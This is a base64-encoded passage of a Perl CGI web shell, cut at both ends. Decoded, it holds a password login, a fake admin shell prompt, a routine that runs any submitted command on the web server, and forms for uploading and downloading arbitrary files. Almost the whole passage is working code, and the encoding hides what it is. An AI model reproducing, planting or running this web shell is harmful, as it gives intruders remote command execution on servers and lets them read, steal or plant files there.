Z291dAp7CglwcmludCAiU2V0LUNvb2tpZTogU0FWRURQV0Q9O1xuIjsgIyByZW1vdmUgcGFzc3dvcmQgY29va2llCgkmUHJpbnRQYWdlSGVhZGVyKCJwIik7CgkmUHJpbnRMb2dvdXRTY3JlZW47CgkmUHJpbnRMb2dpblNjcmVlbjsKCSZQcmludExvZ2luRm9ybTsKCSZQcmludFBhZ2VGb290ZXI7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB0byBsb2dpbiB0aGUgdXNlci4gSWYgdGhlIHBhc3N3b3JkIG1hdGNoZXMsIGl0CiMgZGlzcGxheXMgYSBwYWdlIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHJ1biBjb21tYW5kcy4gSWYgdGhlIHBhc3N3b3JkIGRvZW5zJ3QKIyBtYXRjaCBvciBpZiBubyBwYXNzd29yZCBpcyBlbnRlcmVkLCBpdCBkaXNwbGF5cyBhIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIKIyB0byBsb2dpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQZXJmb3JtTG9naW4gCnsKCWlmKCRMb2dpblBhc3N3b3JkIGVxICRQYXNzd29yZCkgIyBwYXNzd29yZCBtYXRjaGVkCgl7CgkJcHJpbnQgIlNldC1Db29raWU6IFNBVkVEUFdEPSRMb2dpblBhc3N3b3JkO1xuIjsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCX0KCWVsc2UgIyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJwIik7CgkJJlByaW50TG9naW5TY3JlZW47CgkJaWYoJExvZ2luUGFzc3dvcmQgbmUgIiIpICMgc29tZSBwYXNzd29yZCB3YXMgZW50ZXJlZAoJCXsKCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOwoJCX0KCQkmUHJpbnRMb2dpbkZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGVudGVyIGNvbW1hbmRzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0KewoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CglwcmludCA8PEVORDsKPGNvZGU+Cjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFuZCI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CiRQcm9tcHQKPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPgo8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRW50ZXIiPgo8L2Zvcm0+CjwvY29kZT4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBkb3dubG9hZCBmaWxlcwojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludEZpbGVEb3dubG9hZEZvcm0KewoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CglwcmludCA8PEVORDsKPGNvZGU+Cjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iZG93bmxvYWQiPgokUHJvbXB0IGRvd25sb2FkPGJyPjxicj4KRmlsZW5hbWU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4KRG93bmxvYWQ6IDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+CjwvZm9ybT4KPC9jb2RlPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHVwbG9hZCBmaWxlcwojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludEZpbGVVcGxvYWRGb3JtCnsKCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkQ3VycmVudERpcl1cJCAiOwoJcHJpbnQgPDxFTkQ7Cjxjb2RlPgo8Zm9ybSBuYW1lPSJmIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4KJFByb21wdCB1cGxvYWQ8YnI+PGJyPgpGaWxlbmFtZTogPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImYiIHNpemU9IjM1Ij48YnI+PGJyPgpPcHRpb25zOiAmbmJzcDs8aW5wdXQgdHlwZT0iY2hlY2tib3giIG5hbWU9Im8iIHZhbHVlPSJvdmVyd3JpdGUiPgpPdmVyd3JpdGUgaWYgaXQgRXhpc3RzPGJyPjxicj4KVXBsb2FkOiZuYnNwOyZuYnNwOyZuYnNwOzxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJ1cGxvYWQiPgo8L2Zvcm0+CjwvY29kZT4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB0aW1lb3V0IGZvciBhIGNvbW1hbmQgZXhwaXJlcy4gV2UgbmVlZCB0bwojIHRlcm1pbmF0ZSB0aGUgc2NyaXB0IGltbWVkaWF0ZWx5LiBUaGlzIGZ1bmN0aW9uIGlzIHZhbGlkIG9ubHkgb24gVW5peC4gSXQgaXMKIyBuZXZlciBjYWxsZWQgd2hlbiB0aGUgc2NyaXB0IGlzIHJ1bm5pbmcgb24gTlQuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIENvbW1hbmRUaW1lb3V0CnsKCWlmKCEkV2luTlQpCgl7CgkJYWxhcm0oMCk7CgkJcHJpbnQgPDxFTkQ7CjwveG1wPgo8Y29kZT4KQ29tbWFuZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25kKHMpLgo8YnI+S2lsbGVkIGl0IQo8Y29kZT4KRU5ECgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCQlleGl0OwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gZXhlY3V0ZSBjb21tYW5kcy4gSXQgZGlzcGxheXMgdGhlIG91dHB1dCBvZiB0aGUKIyBjb21tYW5kIGFuZCBhbGxvd3MgdGhlIHVzZXIgdG8gZW50ZXIgYW5vdGhlciBjb21tYW5kLiBUaGUgY2hhbmdlIGRpcmVjdG9yeQojIGNvbW1hbmQgaXMgaGFuZGxlZCBkaWZmZXJlbnRseS4gSW4gdGhpcyBjYXNlLCB0aGUgbmV3IGRpcmVjdG9yeSBpcyBzdG9yZWQgaW4KIyBhbiBpbnRlcm5hbCB2YXJpYWJsZSBhbmQgaXMgdXNlZCBlYWNoIHRpbWUgYSBjb21tYW5kIGhhcyB0byBiZSBleGVjdXRlZC4gVGhlCiMgb3V0cHV0IG9mIHRoZSBjaGFuZ2UgZGlyZWN0b3J5IGNvbW1hbmQgaXMgbm90IGRpc3BsYXllZCB0byB0aGUgdXNlcnMKIyB0aGVyZWZvcmUgZXJyb3IgbWVzc2FnZXMgY2Fubm90IGJlIGRpc3BsYXllZC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgRXhlY3V0ZUNvbW1hbmQKewoJaWYoJFJ1bkNvbW1hbmQgPX4gbS9eXHMqY2RccysoLispLykgIyBpdCBpcyBhIGNoYW5nZSBkaXIgY29tbWFuZAoJewoJCSMgd2UgY2hhbmdlIHRoZSBkaXJlY3RvcnkgaW50ZXJuYWxseS4gVGhlIG91dHB1dCBvZiB0aGUKCQkjIGNvbW1hbmQgaXMgbm90IGRpc3BsYXllZC4KCQkKCQkkT2xkRGlyID0gJEN1cnJlbnREaXI7CgkJJENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiJjZCAkMSIuJENtZFNlcC4kQ21kUHdkOwoJCWNob3AoJEN1cnJlbnREaXIgPSBgJENvbW1hbmRgKTsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJJFByb21wdCA9ICRXaW5OVCA/ICIkT2xkRGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJE9sZERpcl1cJCAiOwoJCXByaW50ICI8Y29kZT4kUHJvbXB0ICRSdW5Db21tYW5kPC9jb2RlPiI7Cgl9CgllbHNlICMgc29tZSBvdGhlciBjb21tYW5kLCBkaXNwbGF5IHRoZSBvdXRwdXQKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CgkJcHJpbnQgIjxjb2RlPiRQcm9tcHQgJFJ1bkNvbW1hbmQ8L2NvZGU+PHhtcD4iOwoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnREaXJcIiIuJENtZFNlcC4kUnVuQ29tbWFuZC4kUmVkaXJlY3RvcjsKCQlpZighJFdpbk5UKQoJCXsKCQkJJFNJR3snQUxSTSd9ID0gXCZDb21tYW5kVGltZW91dDsKCQkJYWxhcm0oJENvbW1hbmRUaW1lb3V0RHVyYXRpb24pOwoJCX0KCQlpZigkU2hvd0R5bmFtaWNPdXRwdXQpICMgc2hvdyBvdXRwdXQgYXMgaXQgaXMgZ2VuZXJhdGVkCgkJewoJCQkkfD0xOwoJCQkkQ29tbWFuZCAuPSAiIHwiOwoJCQlvcGVuKENvbW1hbmRPdXRwdXQsICRDb21tYW5kKTsKCQkJd2hpbGUoPENvbW1hbmRPdXRwdXQ+KQoJCQl7CgkJCQkkXyA9fiBzLyhcbnxcclxuKSQvLzsKCQkJCXByaW50ICIkX1xuIjsKCQkJfQoJCQkkfD0wOwoJCX0KCQllbHNlICMgc2hvdyBvdXRwdXQgYWZ0ZXIgY29tbWFuZCBjb21wbGV0ZXMKCQl7CgkJCXByaW50IGAkQ29tbWFuZGA7CgkJfQoJCWlmKCEkV2luTlQpCgkJewoJCQlhbGFybSgwKTsKCQl9CgkJcHJpbnQgIjwveG1wPiI7Cgl9CgkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsKCSZQcmludFBhZ2VGb290ZXI7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGRpc3BsYXlzIHRoZSBwYWdlIHRoYXQgY29udGFpbnMgYSBsaW5rIHdoaWNoIGFsbG93cyB0aGUgdXNlcgojIHRvIGRvd25sb2FkIHRoZSBzcGVjaWZpZWQgZmlsZS4gVGhlIHBhZ2UgYWxzbyBjb250YWlucyBhIGF1dG8tcmVmcmVzaAojIGZlYXR1cmUgdGhhdCBzdGFydHMgdGhlIGRvd25sb2FkIGF1dG9tYXRpY2FsbHkuCiMgQXJndW1lbnQgMTogRnVsbHkgcXVhbGlmaWVkIGZpbGVuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2FkZWQKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnREb3dubG9hZExpbmtQYWdlCnsKCWxvY2FsKCRGaWxlVXJsKSA9IEBfOwoJaWYoLWUgJEZpbGVVcmwpICMgaWYgdGhlIGZpbGUgZXhpc3RzCgl7CgkJIyBlbmNvZGUgdGhlIGZpbGUgbGluayBzbyB3ZSBjYW4gc2VuZCBpdCB0byB0aGUgYnJvd3NlcgoJCSRGaWxlVXJsID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsKCQkkRG93bmxvYWRMaW5rID0gIiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2FkJmY9JEZpbGVVcmwmbz1nbyI7CgkJJEh0bWxNZXRhSGVhZGVyID0gIjxtZXRhIEhUVFAtRVFVSVY9XCJSZWZyZXNoXCIgQ09OVEVOVD1cIjE7IFVSTD0kRG93bmxvYWRMaW5rXCI+IjsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJcHJpbnQgPDxFTkQ7Cjxjb2RlPgpTZW5kaW5nIEZpbGUgJFRyYW5zZmVyRmlsZS4uLjxicj4KSWYgdGhlIGRvd25sb2FkIGRvZXMgbm90IHN0YXJ0IGF1dG9tYXRpY2FsbHksCjxhIGhyZWY9IiREb3dubG9hZExpbmsiPkNsaWNrIEhlcmU8L2E+Lgo8L2NvZGU+CkVORAoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7Cgl9CgllbHNlICMgZmlsZSBkb2Vzbid0IGV4aXN0Cgl7CgkJJlByaW50UGFnZUhlYWRlcigiZiIpOwoJCXByaW50ICI8Y29kZT5GYWlsZWQgdG8gZG93bmxvYWQgJEZpbGVVcmw6ICQhPC9jb2RlPiI7CgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsKCQkmUHJpbnRQYWdlRm9vdGVyOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJvbSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlCiMgYnJvd3Nlciwgc28gdGhhdCBpdCBjYW4gYmUgZG93bmxvYWRlZCBieSB0aGUgdXNlci4KIyBBcmd1bWVudCAxOiBGdWxseSBxdWFsaWZpZWQgcGF0aG5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgc2VudC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgU2VuZEZpbGVUb0Jyb3dzZXIKewoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOwoJaWYob3BlbihTRU5ERklMRSwgJFNlbmRGaWxlKSkgIyBmaWxlIG9wZW5lZCBmb3IgcmVhZGluZwoJewoJCWlmKCRXaW5OVCkKCQl7CgkJCWJpbm1vZGUoU0VOREZJTEUpOwoJCQliaW5tb2RlKFNURE9VVCk7CgkJfQoJCSRGaWxlU2l6ZSA9IChzdGF0KCRTZW5kRmlsZSkpWzddOwoJCSgkRmlsZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsKCQlwcmludCAiQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXVua25vd25cbiI7CgkJcHJpbnQgIkNvbnRlbnQtTGVuZ3RoOiAkRmlsZVNpemVcbiI7CgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPSQxXG5cbiI7CgkJcHJpbnQgd2hpbGUoPFNFTkRGSUxFPik7CgkJY2xvc2UoU0VOREZJTEUpOwoJfQoJZWxzZSAjIGZhaWxlZCB0byBvcGVuIGZpbGUKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7CgkJcHJpbnQgIjxjb2RlPkZhaWxlZCB0byBkb3dubG9hZCAkU2VuZEZpbGU6ICQhPC9jb2RlPiI7CgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsKCQkmUHJpbnRQYWdlRm9vdGVyOwoJfQp9CgoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgZG93bmxvYWRzIGEgZmlsZS4gSXQgZGlzcGxheXMgYSBtZXNzYWdlCiMgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluayB0aHJvdWdoIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLgojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWxsZWQgd2hlbiB0aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsCiMgdGhlIGZpbGUgaXMgcmVhZCBhbmQgc2VudCB0byB0aGUgYnJvd3Nlci4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgQmVnaW5Eb3dubG9hZAp7CgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwKCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUKCXsKCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7Cgl9CgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQoJewoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87CgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsKCX0KCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQoJewoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7Cgl9CgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQoJewoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlLiBJZiB0aGUKIyBmaWxlIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGEKIyBmaWxlLCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgVXBsb2FkRmlsZQp7CgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgdXBsb2FkIGZvcm0gYWdhaW4KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpCgl7CgkJJlByaW50UGFnZUhlYWRlcigiZiIpOwoJCSZQcmludEZpbGVVcGxvYWRGb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7CgkJcmV0dXJuOwoJfQoJJlByaW50UGFnZUhlYWRlcigiYyIpOwoKCSMgc3RhcnQgdGhlIHVwbG9hZGluZyBwcm9jZXNzCglwcmludCAiPGNvZGU+VXBsb2FkaW5nICRUcmFuc2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsKCgkjIGdldCB0aGUgZnVsbGx5IHF1YWxpZmllZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBjcmVhdGVkCgljaG9wKCRUYXJnZXROYW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsKCSRUcmFuc2ZlckZpbGUgPX4gbSEoW14vXlxcXSopJCE7CgkkVGFyZ2V0TmFtZSAuPSAkUGF0aFNlcC4kMTsKCgkkVGFyZ2V0RmlsZVNpemUgPSBsZW5ndGgoJGlueydmaWxlZGF0YSd9KTsKCSMgaWYgdGhlIGZpbGUgZXhpc3RzIGFuZCB3ZSBhcmUgbm90IHN1cHBvc2VkIHRvIG92ZXJ3cml0ZSBpdAoJaWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpCgl7CgkJcHJpbnQgIkZhaWxlZDogRGVzdGluYXRpb24gZmlsZSBhbHJlYWR5IGV4aXN0cy48YnI+IjsKCX0KCWVsc2UgIyBmaWxlIGlzIG5vdCBwcmVzZW50Cgl7CgkJaWYob3BlbihVUExPQURGSUxFLCAiPiRUYXJnZXROYW1lIikpCgkJewoJCQliaW5tb2RlKFVQTE9BREZJTEUpIGlmICRXaW5OVDsKCQkJcHJpbnQgVVBMT0FERklMRSAkaW57J2ZpbGVkYXRhJ307CgkJCWNsb3NlKFVQTE9BREZJTEUpOwoJCQlwcmludCAiVHJhbnNmZXJlZCAkVGFyZ2V0RmlsZVNpemUgQnl0ZXMuPGJyPiI7CgkJCXByaW50ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7CgkJfQoJCWVsc2UKCQl7CgkJCXByaW50ICJGYWlsZWQ6ICQhPGJyPiI7CgkJfQoJfQoJcHJpbnQgIjwvY29kZT4iOwoJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkmUHJpbnRQYWdlRm9vdGVyOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byBkb3dubG9hZCBhIGZpbGUuIElmIHRoZQojIGZpbGVuYW1lIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGEKIyBmaWxlLCBvdGhlcndpc2UgaXQgZGlzcGxheXMgYSBtZXNzYWdlIHRvIHRoZSB1c2VyIGFuZCBwcm92aWRlcyBhIGxpbmsKIyB0aHJvdWdoICB3aGljaCB0aGUgZmlsZSBjYW4gYmUgZG93bmxvYWRlZC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgRG93bmxvYWRGaWxlCnsKCSMgaWYgbm8gZmlsZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSBkb3dubG9hZCBmb3JtIGFnYWluCglpZigkVHJhbnNmZXJGaWxlIGVxICIiKQoJewoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsKCQkmUHJpbnRGaWxlRG93bmxvYWRGb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7CgkJcmV0dXJuOwoJfQoJCgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwKCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUKCXsKCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7Cgl9CgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQoJewoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87CgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsKCX0KCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQoJewoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7Cgl9CgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQoJewoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgTWFpbiBQcm9ncmFtIC0gRXhlY3V0aW9uIFN0YXJ0cyBIZXJlCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KJlJlYWRQYXJzZTsKJkdldENvb2tpZXM7CgokU2NyaXB0TG9jYXRpb24gPSAkRU5WeydTQ1JJUFRfTkFNRSd9OwokU2VydmVyTmFtZSA9ICRFTlZ7J1NFUlZFUl9OQU1FJ307CiRMb2dpblBhc3N3b3JkID0gJGlueydwJ307CiRSdW5Db21tYW5kID0gJGlueydjJ307CiRUcmFuc2ZlckZpbGUgPSAkaW57J2YnfTsKJE9wdGlvbnMgPSAkaW57J28nfTsKCiRBY3Rpb24gPSAkaW57J2EnfTsKJEFjdGlvbiA9ICJsb2dpbiIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNpZmllZCwgdXNlIGRl